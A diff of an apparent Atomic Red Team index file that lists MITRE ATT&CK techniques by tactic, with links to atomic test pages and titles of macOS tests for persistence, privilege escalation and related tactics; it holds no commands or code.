+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
+  - Atomic Test #3: Enable Guest Account on macOS [macos]
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
+  - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# execution
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1047 Windows Management Instrumentation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.002 Inter-Process Communication: Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.001 Command and Scripting Interpreter: PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.011 Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.003 Command and Scripting Interpreter: Windows Command Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1569.002 System Services: Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # persistence
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
-  - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
-  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1176 Browser Extensions](../../T1176/T1176.md)
   - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
   - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
   - Atomic Test #3: Firefox [linux, windows, macos]
   - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
-- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
-  - Atomic Test #1: Logon Scripts - Mac [macos]
+- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
-  - Atomic Test #1: Launch Daemon [macos]
-  - Atomic Test #2: Launch Daemon - Users Directory [macos]
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #3: Enable Guest Account on macOS [macos]
-- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
-  - Atomic Test #1: Trap EXIT [macos, linux]
-  - Atomic Test #3: Trap SIGINT [macos, linux]
-- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
-  - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
   - Atomic Test #3: Create a user account on a MacOS system [macos]
-- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
-  - Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
-  - Atomic Test #2: Add macOS LoginItem using Applescript [macos]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1554 Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
-  - Atomic Test #1: Persistance with Event Monitor - emond [macos]
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
-  - Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
-  - Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
-  - Atomic Test #1: Add command to .bash_profile [macos, linux]
-  - Atomic Test #2: Add command to .bashrc [macos, linux]
-- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
-  - Atomic Test #1: Add file to Local Library StartupItems [macos]
-  - Atomic Test #2: Add launch script to launch daemon [macos]
-  - Atomic Test #3: Add launch script to launch agent [macos]
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
-  - Atomic Test #1: Launch Agent [macos]
-  - Atomic Test #2: Event Monitor Daemon Persistence [macos]
-  - Atomic Test #3: Launch Agent - Root Directory [macos]
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
-  - Atomic Test #1: rc.common [macos]
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
-  - Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
-  - Atomic Test #2: Re-Opened Applications using LoginHook [macos]
-  - Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1653 Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
   - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
   - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
   - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # command-and-control
 - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -268,6 +425,7 @@
   - Atomic Test #1: Base64 Encoded data. [macos, linux]
 - T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -295,7 +453,7 @@
 - T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
